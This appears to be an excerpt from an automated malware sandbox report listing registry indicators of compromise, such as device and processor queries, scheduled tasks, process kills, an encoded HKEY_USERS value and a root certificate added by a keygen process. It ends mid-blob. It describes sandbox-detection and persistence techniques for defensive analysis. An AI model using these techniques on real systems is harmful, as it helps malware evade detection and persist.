\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID svchost.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI FF52.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI seed.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI FF52.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
D5EE.tmp.exeCD11.exe5.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 D5EE.tmp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString D5EE.tmp.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 CD11.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString CD11.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 5.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 7012 schtasks.exe 7036 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 6508 timeout.exe 4272 timeout.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 4604 taskkill.exe 2404 taskkill.exe 6384 taskkill.exe -
Modifies Control Panel 1 IoCs
Processes:
MicrosoftEdge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\Colors MicrosoftEdge.exe -
Processes:
browser_broker.exeMicrosoftEdgeCP.exeMicrosoftEdge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe -
Modifies data under HKEY_USERS 5 IoCs
Processes:
file.exesvchost.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\PegasPc file.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Buses svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Control Panel\Buses\Config0 = 14cef73f2452350524edb47d450dd49d084297dce82e72baa46d34fdc48d541d5740dec586cd945d24edb47d470dd49d024195daf71261adc06d04fda6e22673bbc9154961cda5691cdb8d45733de7a8644490bdb67f2ce9935e02cbfc8d3c74bbc4103d35f5ac6913d5814a7434d4f10b4c90d8f6127db9a45e3494b48d662fd69a430f32fea05d579fc2223064b9f8641cc78bbd7c20ea915d00fda8e2377c88f2005469a8946c10d582447c3ae4a9542d109dc84f3442053534fdc48d551de4ad035276a6cb2e569bb47d440dd49d642d4c82eef251dda46d34fe089f571de4ad750c3cf8ba6f11d99a4c7d3dfaaf5515f4bd844d14dda46d34fdc48d541de4ad743d04cd945d24edb47d440dd49d642df4bd844d14dda46d34fdc48d541de4ad74d905cd94 svchost.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B7216 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 998267c856add601 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-08760 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\OneTimeCleanup = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "nb7jqre" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "5" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer MicrosoftEdge.exe -
Processes:
keygen-step-2.exeSetup.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 keygen-step-2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a1